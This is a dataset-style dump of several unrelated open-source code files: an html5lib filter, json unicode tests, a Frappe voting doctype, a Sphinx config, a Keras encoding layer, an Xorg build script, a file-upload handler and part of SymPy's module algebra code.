repo_name stringlengths 5 100 | path stringlengths 4 294 | copies stringclasses 990
values | size stringlengths 4 7 | content stringlengths 666 1M | license stringclasses 15
values |
|---|---|---|---|---|---|
odejesush/tensorflow | venv/lib/python2.7/site-packages/pip/_vendor/html5lib/filters/whitespace.py | 353 | 1139 | from __future__ import absolute_import, division, unicode_literals
import re
from . import base
from ..constants import rcdataElements, spaceCharacters
spaceCharacters = "".join(spaceCharacters)
SPACES_REGEX = re.compile("[%s]+" % spaceCharacters)
class Filter(base.Filter):
spacePreserveElements = frozenset(["pre", "textarea"] + list(rcdataElements))
def __iter__(self):
preserve = 0
for token in base.Filter.__iter__(self):
type = token["type"]
if type == "StartTag" \
and (preserve or token["name"] in self.spacePreserveElements):
preserve += 1
elif type == "EndTag" and preserve:
preserve -= 1
elif not preserve and type == "SpaceCharacters" and token["data"]:
# Test on token["data"] above to not introduce spaces where there were not
token["data"] = " "
elif not preserve and type == "Characters":
token["data"] = collapse_spaces(token["data"])
yield token
def collapse_spaces(text):
return SPACES_REGEX.sub(' ', text)
| apache-2.0 |
albertjan/pypyjs | website/js/pypy.js-0.2.0/lib/modules/json/tests/test_unicode.py | 11 | 3779 | from collections import OrderedDict
from json.tests import PyTest, CTest
class TestUnicode(object):
def test_encoding1(self):
encoder = self.json.JSONEncoder(encoding='utf-8')
u = u'\N{GREEK SMALL LETTER ALPHA}\N{GREEK CAPITAL LETTER OMEGA}'
s = u.encode('utf-8')
ju = encoder.encode(u)
js = encoder.encode(s)
self.assertEqual(ju, js)
def test_encoding2(self):
u = u'\N{GREEK SMALL LETTER ALPHA}\N{GREEK CAPITAL LETTER OMEGA}'
s = u.encode('utf-8')
ju = self.dumps(u, encoding='utf-8')
js = self.dumps(s, encoding='utf-8')
self.assertEqual(ju, js)
def test_encoding3(self):
u = u'\N{GREEK SMALL LETTER ALPHA}\N{GREEK CAPITAL LETTER OMEGA}'
j = self.dumps(u)
self.assertEqual(j, '"\\u03b1\\u03a9"')
def test_encoding4(self):
u = u'\N{GREEK SMALL LETTER ALPHA}\N{GREEK CAPITAL LETTER OMEGA}'
j = self.dumps([u])
self.assertEqual(j, '["\\u03b1\\u03a9"]')
def test_encoding5(self):
u = u'\N{GREEK SMALL LETTER ALPHA}\N{GREEK CAPITAL LETTER OMEGA}'
j = self.dumps(u, ensure_ascii=False)
self.assertEqual(j, u'"{0}"'.format(u))
def test_encoding6(self):
u = u'\N{GREEK SMALL LETTER ALPHA}\N{GREEK CAPITAL LETTER OMEGA}'
j = self.dumps([u], ensure_ascii=False)
self.assertEqual(j, u'["{0}"]'.format(u))
def test_big_unicode_encode(self):
u = u'\U0001d120'
self.assertEqual(self.dumps(u), '"\\ud834\\udd20"')
self.assertEqual(self.dumps(u, ensure_ascii=False), u'"\U0001d120"')
def test_big_unicode_decode(self):
u = u'z\U0001d120x'
self.assertEqual(self.loads('"' + u + '"'), u)
self.assertEqual(self.loads('"z\\ud834\\udd20x"'), u)
def test_unicode_decode(self):
for i in range(0, 0xd7ff):
u = unichr(i)
s = '"\\u{0:04x}"'.format(i)
self.assertEqual(self.loads(s), u)
def test_object_pairs_hook_with_unicode(self):
s = u'{"xkd":1, "kcw":2, "art":3, "hxm":4, "qrt":5, "pad":6, "hoy":7}'
p = [(u"xkd", 1), (u"kcw", 2), (u"art", 3), (u"hxm", 4),
(u"qrt", 5), (u"pad", 6), (u"hoy", 7)]
self.assertEqual(self.loads(s), eval(s))
self.assertEqual(self.loads(s, object_pairs_hook = lambda x: x), p)
od = self.loads(s, object_pairs_hook = OrderedDict)
self.assertEqual(od, OrderedDict(p))
self.assertEqual(type(od), OrderedDict)
# the object_pairs_hook takes priority over the object_hook
self.assertEqual(self.loads(s,
object_pairs_hook = OrderedDict,
object_hook = lambda x: None),
OrderedDict(p))
def test_default_encoding(self):
self.assertEqual(self.loads(u'{"a": "\xe9"}'.encode('utf-8')),
{'a': u'\xe9'})
def test_unicode_preservation(self):
self.assertEqual(type(self.loads(u'""')), unicode)
self.assertEqual(type(self.loads(u'"a"')), unicode)
self.assertEqual(type(self.loads(u'["a"]')[0]), unicode)
# Issue 10038.
self.assertEqual(type(self.loads('"foo"')), unicode)
def test_encode_not_utf_8(self):
self.assertEqual(self.dumps('\xb1\xe6', encoding='iso8859-2'),
'"\\u0105\\u0107"')
self.assertEqual(self.dumps(['\xb1\xe6'], encoding='iso8859-2'),
'["\\u0105\\u0107"]')
def test_bad_encoding(self):
self.assertRaises(UnicodeEncodeError, self.loads, '"a"', u"rat\xe9")
self.assertRaises(TypeError, self.loads, '"a"', 1)
class TestPyUnicode(TestUnicode, PyTest): pass
class TestCUnicode(TestUnicode, CTest): pass
| mit |
rohitwaghchaure/vestasi-frappe | frappe/website/doctype/user_vote/user_vote.py | 28 | 1673 | # Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import frappe
from frappe.website.permissions import get_access
from frappe.website.doctype.website_group.website_group import clear_cache
from frappe.model.document import Document
class UserVote(Document):
def after_insert(self):
clear_cache(self.ref_name)
def validate(self):
# if new
if self.get("__islocal"):
if frappe.db.get_value("User Vote", {"ref_doctype": self.ref_doctype,
"ref_name": self.ref_name, "owner": frappe.session.user}):
raise frappe.DuplicateEntryError
def on_update(self):
self.update_ref_count()
def on_trash(self):
self.update_ref_count(-1)
def update_ref_count(self, cnt=0):
count = frappe.db.sql("""select count(*) from `tabUser Vote` where ref_doctype=%s and ref_name=%s""",
(self.ref_doctype, self.ref_name))[0][0]
frappe.db.set_value(self.ref_doctype, self.ref_name, "upvotes", count + cnt)
def on_doctype_update():
frappe.db.add_index("User Vote", ["ref_doctype", "ref_name"])
# don't allow guest to give vote
@frappe.whitelist()
def set_vote(ref_doctype, ref_name):
website_group_name = frappe.db.get_value(ref_doctype, ref_name, "website_group")
group = frappe.get_doc("Website Group", website_group_name)
if not get_access(group, group.get_route()).get("read"):
raise frappe.PermissionError
try:
user_vote = frappe.get_doc({
"doctype": "User Vote",
"ref_doctype": ref_doctype,
"ref_name": ref_name
})
user_vote.ignore_permissions = True
user_vote.insert()
return "ok"
except frappe.DuplicateEntryError:
return "duplicate"
| mit |
vrkansagara/guzzle | docs/conf.py | 51 | 2008 | import sys, os
from sphinx.highlighting import lexers
from pygments.lexers.web import PhpLexer
lexers['php'] = PhpLexer(startinline=True, linenos=1)
lexers['php-annotations'] = PhpLexer(startinline=True, linenos=1)
primary_domain = 'php'
extensions = []
templates_path = ['_templates']
source_suffix = '.rst'
master_doc = 'index'
project = u'Guzzle'
copyright = u'2015, Michael Dowling'
version = '6'
html_title = "Guzzle Documentation"
html_short_title = "Guzzle 6"
exclude_patterns = ['_build']
html_static_path = ['_static']
##### Guzzle sphinx theme
import guzzle_sphinx_theme
html_translator_class = 'guzzle_sphinx_theme.HTMLTranslator'
html_theme_path = guzzle_sphinx_theme.html_theme_path()
html_theme = 'guzzle_sphinx_theme'
# Custom sidebar templates, maps document names to template names.
html_sidebars = {
'**': ['logo-text.html', 'globaltoc.html', 'searchbox.html']
}
# Register the theme as an extension to generate a sitemap.xml
extensions.append("guzzle_sphinx_theme")
# Guzzle theme options (see theme.conf for more information)
html_theme_options = {
# Set the path to a special layout to include for the homepage
# "index_template": "homepage.html",
# Allow a separate homepage from the master_doc
# homepage = index
# Set the name of the project to appear in the nav menu
# "project_nav_name": "Guzzle",
# Set your Disqus short name to enable comments
# "disqus_comments_shortname": "my_disqus_comments_short_name",
# Set you GA account ID to enable tracking
# "google_analytics_account": "my_ga_account",
# Path to a touch icon
# "touch_icon": "",
# Specify a base_url used to generate sitemap.xml links. If not
# specified, then no sitemap will be built.
"base_url": "http://guzzlephp.org"
# Allow the "Table of Contents" page to be defined separately from "master_doc"
# tocpage = Contents
# Allow the project link to be overriden to a custom URL.
# projectlink = http://myproject.url
}
| mit |
petewarden/tensorflow | tensorflow/python/keras/layers/preprocessing/category_encoding.py | 2 | 8532 | # Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Keras CategoryEncoding preprocessing layer."""
# pylint: disable=g-classes-have-attributes
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_spec
from tensorflow.python.keras import backend as K
from tensorflow.python.keras.engine import base_preprocessing_layer
from tensorflow.python.keras.utils import layer_utils
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import bincount_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util.tf_export import keras_export
INT = "int"
BINARY = "binary"
COUNT = "count"
@keras_export("keras.layers.experimental.preprocessing.CategoryEncoding")
class CategoryEncoding(base_preprocessing_layer.PreprocessingLayer):
"""Category encoding layer.
This layer provides options for condensing data into a categorical encoding
when the total number of tokens are known in advance. It accepts integer
values as inputs and outputs a dense representation (one sample = 1-index
tensor of float values representing data about the sample's tokens) of those
inputs. For integer inputs where the total number of tokens is not known, see
`tf.keras.layers.experimental.preprocessing.IntegerLookup`.
Examples:
**Multi-hot encoding data**
>>> layer = tf.keras.layers.experimental.preprocessing.CategoryEncoding(
... num_tokens=4, output_mode="binary")
>>> layer([[0, 1], [0, 0], [1, 2], [3, 1]])
<tf.Tensor: shape=(4, 4), dtype=float32, numpy=
array([[1., 1., 0., 0.],
[1., 0., 0., 0.],
[0., 1., 1., 0.],
[0., 1., 0., 1.]], dtype=float32)>
**Using weighted inputs in `count` mode**
>>> layer = tf.keras.layers.experimental.preprocessing.CategoryEncoding(
... num_tokens=4, output_mode="count")
>>> count_weights = np.array([[.1, .2], [.1, .1], [.2, .3], [.4, .2]])
>>> layer([[0, 1], [0, 0], [1, 2], [3, 1]], count_weights=count_weights)
<tf.Tensor: shape=(4, 4), dtype=float64, numpy=
array([[0.1, 0.2, 0. , 0. ],
[0.2, 0. , 0. , 0. ],
[0. , 0.2, 0.3, 0. ],
[0. , 0.2, 0. , 0.4]])>
Args:
num_tokens: The total number of tokens the layer should support. All inputs
to the layer must integers in the range 0 <= value < num_tokens or an
error will be thrown.
output_mode: Specification for the output of the layer.
Defaults to "binary". Values can
be "binary" or "count", configuring the layer as follows:
"binary": Outputs a single int array per batch, of num_tokens size,
containing 1s in all elements where the token mapped to that index
exists at least once in the batch item.
"count": As "binary", but the int array contains a count of the number
of times the token at that index appeared in the batch item.
sparse: Boolean. If true, returns a `SparseTensor` instead of a dense
`Tensor`. Defaults to `False`.
Call arguments:
inputs: A 2D tensor `(samples, timesteps)`.
count_weights: A 2D tensor in the same shape as `inputs` indicating the
weight for each sample value when summing up in `count` mode. Not used in
`binary` mode.
"""
def __init__(self,
num_tokens=None,
output_mode=BINARY,
sparse=False,
**kwargs):
# max_tokens is an old name for the num_tokens arg we continue to support
# because of usage.
if "max_tokens" in kwargs:
logging.warning(
"max_tokens is deprecated, please use num_tokens instead.")
num_tokens = kwargs["max_tokens"]
del kwargs["max_tokens"]
super(CategoryEncoding, self).__init__(**kwargs)
# 'output_mode' must be one of (COUNT, BINARY)
layer_utils.validate_string_arg(
output_mode,
allowable_strings=(COUNT, BINARY),
layer_name="CategoryEncoding",
arg_name="output_mode")
if num_tokens is None:
raise ValueError("num_tokens must be set to use this layer. If the "
"number of tokens is not known beforehand, use the "
"IntegerLookup layer instead.")
if num_tokens < 1:
raise ValueError("num_tokens must be >= 1.")
self.num_tokens = num_tokens
self.output_mode = output_mode
self.sparse = sparse
def compute_output_shape(self, input_shape):
return tensor_shape.TensorShape([input_shape[0], self.num_tokens])
def compute_output_signature(self, input_spec):
output_shape = self.compute_output_shape(input_spec.shape.as_list())
if self.sparse:
return sparse_tensor.SparseTensorSpec(
shape=output_shape, dtype=dtypes.int64)
else:
return tensor_spec.TensorSpec(shape=output_shape, dtype=dtypes.int64)
def get_config(self):
config = {
"num_tokens": self.num_tokens,
"output_mode": self.output_mode,
"sparse": self.sparse,
}
base_config = super(CategoryEncoding, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
def call(self, inputs, count_weights=None):
if isinstance(inputs, (list, np.ndarray)):
inputs = ops.convert_to_tensor_v2_with_dispatch(inputs)
if inputs.shape.rank == 1:
inputs = array_ops.expand_dims(inputs, 1)
if count_weights is not None and self.output_mode != COUNT:
raise ValueError("count_weights is not used in `output_mode='binary'`. "
"Please pass a single input.")
out_depth = self.num_tokens
binary_output = (self.output_mode == BINARY)
if isinstance(inputs, sparse_tensor.SparseTensor):
max_value = math_ops.reduce_max(inputs.values)
min_value = math_ops.reduce_min(inputs.values)
else:
max_value = math_ops.reduce_max(inputs)
min_value = math_ops.reduce_min(inputs)
condition = math_ops.logical_and(
math_ops.greater(
math_ops.cast(out_depth, max_value.dtype), max_value),
math_ops.greater_equal(
min_value, math_ops.cast(0, min_value.dtype)))
control_flow_ops.Assert(condition, [
"Input values must be in the range 0 <= values < num_tokens"
" with num_tokens={}".format(out_depth)
])
if self.sparse:
return sparse_bincount(inputs, out_depth, binary_output, count_weights)
else:
return dense_bincount(inputs, out_depth, binary_output, count_weights)
def sparse_bincount(inputs, out_depth, binary_output, count_weights=None):
"""Apply binary or count encoding to an input and return a sparse tensor."""
result = bincount_ops.sparse_bincount(
inputs,
weights=count_weights,
minlength=out_depth,
maxlength=out_depth,
axis=-1,
binary_output=binary_output)
result = math_ops.cast(result, K.floatx())
batch_size = array_ops.shape(result)[0]
result = sparse_tensor.SparseTensor(
indices=result.indices,
values=result.values,
dense_shape=[batch_size, out_depth])
return result
def dense_bincount(inputs, out_depth, binary_output, count_weights=None):
"""Apply binary or count encoding to an input."""
result = bincount_ops.bincount(
inputs,
weights=count_weights,
minlength=out_depth,
maxlength=out_depth,
dtype=K.floatx(),
axis=-1,
binary_output=binary_output)
batch_size = inputs.shape.as_list()[0]
result.set_shape(tensor_shape.TensorShape((batch_size, out_depth)))
return result
| apache-2.0 |
ianmiell/shutit-distro | xorg_apps/xorg_apps.py | 1 | 1658 | """ShutIt module. See http://shutit.tk
"""
from shutit_module import ShutItModule
class xorg_apps(ShutItModule):
def build(self, shutit):
import sd_util
sd_util.setup_x_environment(shutit)
shutit.send('mkdir -p /tmp/build/xorg_apps')
shutit.send('cd /tmp/build/xorg_apps')
shutit.send_host_file('/tmp/build/xorg_apps/app-7.7.md5','context/app-7.7.md5')
shutit.send('''grep -v '^#' app-7.7.md5 | awk '{print $2}' | wget -i- -c -B http://xorg.freedesktop.org/releases/individual/app/''')
shutit.send('md5sum -c app-7.7.md5')
shutit.login(command='bash -e')
shutit.run_script(r'''for package in $(grep -v '^#' ../app-7.7.md5 | awk '{print $2}')
do
packagedir=${package%.tar.bz2}
tar -xf $package
pushd $packagedir
case $packagedir in
luit-[0-9]* )
line1="#ifdef _XOPEN_SOURCE"
line2="# undef _XOPEN_SOURCE"
line3="# define _XOPEN_SOURCE 600"
line4="#endif"
sed -i -e "s@#ifdef HAVE_CONFIG_H@$line1\n$line2\n$line3\n$line4\n\n&@" sys.c
unset line1 line2 line3 line4
;;
esac
./configure $XORG_CONFIG
make
make install
popd
rm -rf $packagedir
done
''')
shutit.pause_point('mkfontscale')
shutit.logout()
return True
def finalize(self, shutit):
shutit.send('rm -rf /tmp/build/xorg_apps')
return True
def module():
return xorg_apps(
'shutit.tk.sd.xorg_apps.xorg_apps', 158844782.026,
description='',
maintainer='',
depends=['shutit.tk.sd.libpng.libpng','shutit.tk.sd.mesalib.mesalib','shutit.tk.sd.xbitmaps.xbitmaps','shutit.tk.sd.xcb_util.xcb_util','shutit.tk.sd.linux_pam.linux_pam']
)
| gpl-2.0 |
anniyananeesh/avenirevents | classes/Uploader/server/gae-python/main.py | 245 | 5845 | # -*- coding: utf-8 -*-
#
# jQuery File Upload Plugin GAE Python Example 2.2.0
# https://github.com/blueimp/jQuery-File-Upload
#
# Copyright 2011, Sebastian Tschan
# https://blueimp.net
#
# Licensed under the MIT license:
# http://www.opensource.org/licenses/MIT
#
from __future__ import with_statement
from google.appengine.api import files, images
from google.appengine.ext import blobstore, deferred
from google.appengine.ext.webapp import blobstore_handlers
import json
import re
import urllib
import webapp2
WEBSITE = 'https://blueimp.github.io/jQuery-File-Upload/'
MIN_FILE_SIZE = 1 # bytes
MAX_FILE_SIZE = 5000000 # bytes
IMAGE_TYPES = re.compile('image/(gif|p?jpeg|(x-)?png)')
ACCEPT_FILE_TYPES = IMAGE_TYPES
THUMBNAIL_MODIFICATOR = '=s80' # max width / height
EXPIRATION_TIME = 300 # seconds
def cleanup(blob_keys):
blobstore.delete(blob_keys)
class UploadHandler(webapp2.RequestHandler):
def initialize(self, request, response):
super(UploadHandler, self).initialize(request, response)
self.response.headers['Access-Control-Allow-Origin'] = '*'
self.response.headers[
'Access-Control-Allow-Methods'
] = 'OPTIONS, HEAD, GET, POST, PUT, DELETE'
self.response.headers[
'Access-Control-Allow-Headers'
] = 'Content-Type, Content-Range, Content-Disposition'
def validate(self, file):
if file['size'] < MIN_FILE_SIZE:
file['error'] = 'File is too small'
elif file['size'] > MAX_FILE_SIZE:
file['error'] = 'File is too big'
elif not ACCEPT_FILE_TYPES.match(file['type']):
file['error'] = 'Filetype not allowed'
else:
return True
return False
def get_file_size(self, file):
file.seek(0, 2) # Seek to the end of the file
size = file.tell() # Get the position of EOF
file.seek(0) # Reset the file position to the beginning
return size
def write_blob(self, data, info):
blob = files.blobstore.create(
mime_type=info['type'],
_blobinfo_uploaded_filename=info['name']
)
with files.open(blob, 'a') as f:
f.write(data)
files.finalize(blob)
return files.blobstore.get_blob_key(blob)
def handle_upload(self):
results = []
blob_keys = []
for name, fieldStorage in self.request.POST.items():
if type(fieldStorage) is unicode:
continue
result = {}
result['name'] = re.sub(
r'^.*\\',
'',
fieldStorage.filename
)
result['type'] = fieldStorage.type
result['size'] = self.get_file_size(fieldStorage.file)
if self.validate(result):
blob_key = str(
self.write_blob(fieldStorage.value, result)
)
blob_keys.append(blob_key)
result['deleteType'] = 'DELETE'
result['deleteUrl'] = self.request.host_url +\
'/?key=' + urllib.quote(blob_key, '')
if (IMAGE_TYPES.match(result['type'])):
try:
result['url'] = images.get_serving_url(
blob_key,
secure_url=self.request.host_url.startswith(
'https'
)
)
result['thumbnailUrl'] = result['url'] +\
THUMBNAIL_MODIFICATOR
except: # Could not get an image serving url
pass
if not 'url' in result:
result['url'] = self.request.host_url +\
'/' + blob_key + '/' + urllib.quote(
result['name'].encode('utf-8'), '')
results.append(result)
deferred.defer(
cleanup,
blob_keys,
_countdown=EXPIRATION_TIME
)
return results
def options(self):
pass
def head(self):
pass
def get(self):
self.redirect(WEBSITE)
def post(self):
if (self.request.get('_method') == 'DELETE'):
return self.delete()
result = {'files': self.handle_upload()}
s = json.dumps(result, separators=(',', ':'))
redirect = self.request.get('redirect')
if redirect:
return self.redirect(str(
redirect.replace('%s', urllib.quote(s, ''), 1)
))
if 'application/json' in self.request.headers.get('Accept'):
self.response.headers['Content-Type'] = 'application/json'
self.response.write(s)
def delete(self):
key = self.request.get('key') or ''
blobstore.delete(key)
s = json.dumps({key: True}, separators=(',', ':'))
if 'application/json' in self.request.headers.get('Accept'):
self.response.headers['Content-Type'] = 'application/json'
self.response.write(s)
class DownloadHandler(blobstore_handlers.BlobstoreDownloadHandler):
def get(self, key, filename):
if not blobstore.get(key):
self.error(404)
else:
# Prevent browsers from MIME-sniffing the content-type:
self.response.headers['X-Content-Type-Options'] = 'nosniff'
# Cache for the expiration time:
self.response.headers['Cache-Control'] = 'public,max-age=%d' % EXPIRATION_TIME
# Send the file forcing a download dialog:
self.send_blob(key, save_as=filename, content_type='application/octet-stream')
app = webapp2.WSGIApplication(
[
('/', UploadHandler),
('/([^/]+)/([^/]+)', DownloadHandler)
],
debug=True
)
| mit |
oliverlee/sympy | sympy/polys/agca/modules.py | 68 | 45727 | """
Computations with modules over polynomial rings.
This module implements various classes that encapsulate groebner basis
computations for modules. Most of them should not be instantiated by hand.
Instead, use the constructing routines on objects you already have.
For example, to construct a free module over ``QQ[x, y]``, call
``QQ[x, y].free_module(rank)`` instead of the ``FreeModule`` constructor.
In fact ``FreeModule`` is an abstract base class that should not be
instantiated, the ``free_module`` method instead returns the implementing class
``FreeModulePolyRing``.
In general, the abstract base classes implement most functionality in terms of
a few non-implemented methods. The concrete base classes supply only these
non-implemented methods. They may also supply new implementations of the
convenience methods, for example if there are faster algorithms available.
"""
from __future__ import print_function, division
from copy import copy
from sympy.polys.polyerrors import CoercionFailed
from sympy.polys.orderings import ProductOrder, monomial_key
from sympy.polys.domains.field import Field
from sympy.polys.agca.ideals import Ideal
from sympy.core.compatibility import iterable, reduce, range
# TODO
# - module saturation
# - module quotient/intersection for quotient rings
# - free resoltutions / syzygies
# - finding small/minimal generating sets
# - ...
##########################################################################
## Abstract base classes #################################################
##########################################################################
class Module(object):
"""
Abstract base class for modules.
Do not instantiate - use ring explicit constructors instead:
>>> from sympy import QQ
>>> from sympy.abc import x
>>> QQ.old_poly_ring(x).free_module(2)
QQ[x]**2
Attributes:
- dtype - type of elements
- ring - containing ring
Non-implemented methods:
- submodule
- quotient_module
- is_zero
- is_submodule
- multiply_ideal
The method convert likely needs to be changed in subclasses.
"""
def __init__(self, ring):
self.ring = ring
def convert(self, elem, M=None):
"""
Convert ``elem`` into internal representation of this module.
If ``M`` is not None, it should be a module containing it.
"""
if not isinstance(elem, self.dtype):
raise CoercionFailed
return elem
def submodule(self, *gens):
"""Generate a submodule."""
raise NotImplementedError
def quotient_module(self, other):
"""Generate a quotient module."""
raise NotImplementedError
def __div__(self, e):
if not isinstance(e, Module):
e = self.submodule(*e)
return self.quotient_module(e)
__truediv__ = __div__
def contains(self, elem):
"""Return True if ``elem`` is an element of this module."""
try:
self.convert(elem)
return True
except CoercionFailed:
return False
def __contains__(self, elem):
return self.contains(elem)
def subset(self, other):
"""
Returns True if ``other`` is is a subset of ``self``.
>>> from sympy.abc import x
>>> from sympy import QQ
>>> F = QQ.old_poly_ring(x).free_module(2)
>>> F.subset([(1, x), (x, 2)])
True
>>> F.subset([(1/x, x), (x, 2)])
False
"""
return all(self.contains(x) for x in other)
def __eq__(self, other):
return self.is_submodule(other) and other.is_submodule(self)
def __ne__(self, other):
return not (self == other)
def is_zero(self):
"""Returns True if ``self`` is a zero module."""
raise NotImplementedError
def is_submodule(self, other):
"""Returns True if ``other`` is a submodule of ``self``."""
raise NotImplementedError
def multiply_ideal(self, other):
"""
Multiply ``self`` by the ideal ``other``.
"""
raise NotImplementedError
def __mul__(self, e):
if not isinstance(e, Ideal):
try:
e = self.ring.ideal(e)
except (CoercionFailed, NotImplementedError):
return NotImplemented
return self.multiply_ideal(e)
__rmul__ = __mul__
def identity_hom(self):
"""Return the identity homomorphism on ``self``."""
raise NotImplementedError
class ModuleElement(object):
"""
Base class for module element wrappers.
Use this class to wrap primitive data types as module elements. It stores
a reference to the containing module, and implements all the arithmetic
operators.
Attributes:
- module - containing module
- data - internal data
Methods that likely need change in subclasses:
- add
- mul
- div
- eq
"""
def __init__(self, module, data):
self.module = module
self.data = data
def add(self, d1, d2):
"""Add data ``d1`` and ``d2``."""
return d1 + d2
def mul(self, m, d):
"""Multiply module data ``m`` by coefficient d."""
return m * d
def div(self, m, d):
"""Divide module data ``m`` by coefficient d."""
return m / d
def eq(self, d1, d2):
"""Return true if d1 and d2 represent the same element."""
return d1 == d2
def __add__(self, om):
if not isinstance(om, self.__class__) or om.module != self.module:
try:
om = self.module.convert(om)
except CoercionFailed:
return NotImplemented
return self.__class__(self.module, self.add(self.data, om.data))
__radd__ = __add__
def __neg__(self):
return self.__class__(self.module, self.mul(self.data,
self.module.ring.convert(-1)))
def __sub__(self, om):
if not isinstance(om, self.__class__) or om.module != self.module:
try:
om = self.module.convert(om)
except CoercionFailed:
return NotImplemented
return self.__add__(-om)
def __rsub__(self, om):
return (-self).__add__(om)
def __mul__(self, o):
if not isinstance(o, self.module.ring.dtype):
try:
o = self.module.ring.convert(o)
except CoercionFailed:
return NotImplemented
return self.__class__(self.module, self.mul(self.data, o))
__rmul__ = __mul__
def __div__(self, o):
if not isinstance(o, self.module.ring.dtype):
try:
o = self.module.ring.convert(o)
except CoercionFailed:
return NotImplemented
return self.__class__(self.module, self.div(self.data, o))
__truediv__ = __div__
def __eq__(self, om):
if not isinstance(om, self.__class__) or om.module != self.module:
try:
om = self.module.convert(om)
except CoercionFailed:
return False
return self.eq(self.data, om.data)
def __ne__(self, om):
return not self.__eq__(om)
##########################################################################
## Free Modules ##########################################################
##########################################################################
class FreeModuleElement(ModuleElement):
"""Element of a free module. Data stored as a tuple."""
def add(self, d1, d2):
return tuple(x + y for x, y in zip(d1, d2))
def mul(self, d, p):
return tuple(x * p for x in d)
def div(self, d, p):
return tuple(x / p for x in d)
def __repr__(self):
from sympy import sstr
return '[' + ', '.join(sstr(x) for x in self.data) + ']'
def __iter__(self):
return self.data.__iter__()
def __getitem__(self, idx):
return self.data[idx]
class FreeModule(Module):
"""
Abstract base class for free modules.
Additional attributes:
- rank - rank of the free module
Non-implemented methods:
- submodule
"""
dtype = FreeModuleElement
def __init__(self, ring, rank):
Module.__init__(self, ring)
self.rank = rank
def __repr__(self):
return repr(self.ring) + "**" + repr(self.rank)
def is_submodule(self, other):
"""
Returns True if ``other`` is a submodule of ``self``.
>>> from sympy.abc import x
>>> from sympy import QQ
>>> F = QQ.old_poly_ring(x).free_module(2)
>>> M = F.submodule([2, x])
>>> F.is_submodule(F)
True
>>> F.is_submodule(M)
True
>>> M.is_submodule(F)
False
"""
if isinstance(other, SubModule):
return other.container == self
if isinstance(other, FreeModule):
return other.ring == self.ring and other.rank == self.rank
return False
def convert(self, elem, M=None):
"""
Convert ``elem`` into the internal representation.
This method is called implicitly whenever computations involve elements
not in the internal representation.
>>> from sympy.abc import x
>>> from sympy import QQ
>>> F = QQ.old_poly_ring(x).free_module(2)
>>> F.convert([1, 0])
[1, 0]
"""
if isinstance(elem, FreeModuleElement):
if elem.module is self:
return elem
if elem.module.rank != self.rank:
raise CoercionFailed
return FreeModuleElement(self,
tuple(self.ring.convert(x, elem.module.ring) for x in elem.data))
elif iterable(elem):
tpl = tuple(self.ring.convert(x) for x in elem)
if len(tpl) != self.rank:
raise CoercionFailed
return FreeModuleElement(self, tpl)
elif elem is 0:
return FreeModuleElement(self, (self.ring.convert(0),)*self.rank)
else:
raise CoercionFailed
def is_zero(self):
"""
Returns True if ``self`` is a zero module.
(If, as this implementation assumes, the coefficient ring is not the
zero ring, then this is equivalent to the rank being zero.)
>>> from sympy.abc import x
>>> from sympy import QQ
>>> QQ.old_poly_ring(x).free_module(0).is_zero()
True
>>> QQ.old_poly_ring(x).free_module(1).is_zero()
False
"""
return self.rank == 0
def basis(self):
"""
Return a set of basis elements.
>>> from sympy.abc import x
>>> from sympy import QQ
>>> QQ.old_poly_ring(x).free_module(3).basis()
([1, 0, 0], [0, 1, 0], [0, 0, 1])
"""
from sympy.matrices import eye
M = eye(self.rank)
return tuple(self.convert(M.row(i)) for i in range(self.rank))
def quotient_module(self, submodule):
"""
Return a quotient module.
>>> from sympy.abc import x
>>> from sympy import QQ
>>> M = QQ.old_poly_ring(x).free_module(2)
>>> M.quotient_module(M.submodule([1, x], [x, 2]))
QQ[x]**2/<[1, x], [x, 2]>
Or more conicisely, using the overloaded division operator:
>>> QQ.old_poly_ring(x).free_module(2) / [[1, x], [x, 2]]
QQ[x]**2/<[1, x], [x, 2]>
"""
return QuotientModule(self.ring, self, submodule)
def multiply_ideal(self, other):
"""
Multiply ``self`` by the ideal ``other``.
>>> from sympy.abc import x
>>> from sympy import QQ
>>> I = QQ.old_poly_ring(x).ideal(x)
>>> F = QQ.old_poly_ring(x).free_module(2)
>>> F.multiply_ideal(I)
<[x, 0], [0, x]>
"""
return self.submodule(*self.basis()).multiply_ideal(other)
def identity_hom(self):
"""
Return the identity homomorphism on ``self``.
>>> from sympy.abc import x
>>> from sympy import QQ
>>> QQ.old_poly_ring(x).free_module(2).identity_hom()
Matrix([
[1, 0], : QQ[x]**2 -> QQ[x]**2
[0, 1]])
"""
from sympy.polys.agca.homomorphisms import homomorphism
return homomorphism(self, self, self.basis())
class FreeModulePolyRing(FreeModule):
"""
Free module over a generalized polynomial ring.
Do not instantiate this, use the constructor method of the ring instead:
>>> from sympy.abc import x
>>> from sympy import QQ
>>> F = QQ.old_poly_ring(x).free_module(3)
>>> F
QQ[x]**3
>>> F.contains([x, 1, 0])
True
>>> F.contains([1/x, 0, 1])
False
"""
def __init__(self, ring, rank):
from sympy.polys.domains.old_polynomialring import PolynomialRingBase
FreeModule.__init__(self, ring, rank)
if not isinstance(ring, PolynomialRingBase):
raise NotImplementedError('This implementation only works over '
+ 'polynomial rings, got %s' % ring)
if not isinstance(ring.dom, Field):
raise NotImplementedError('Ground domain must be a field, '
+ 'got %s' % ring.dom)
def submodule(self, *gens, **opts):
"""
Generate a submodule.
>>> from sympy.abc import x, y
>>> from sympy import QQ
>>> M = QQ.old_poly_ring(x, y).free_module(2).submodule([x, x + y])
>>> M
<[x, x + y]>
>>> M.contains([2*x, 2*x + 2*y])
True
>>> M.contains([x, y])
False
"""
return SubModulePolyRing(gens, self, **opts)
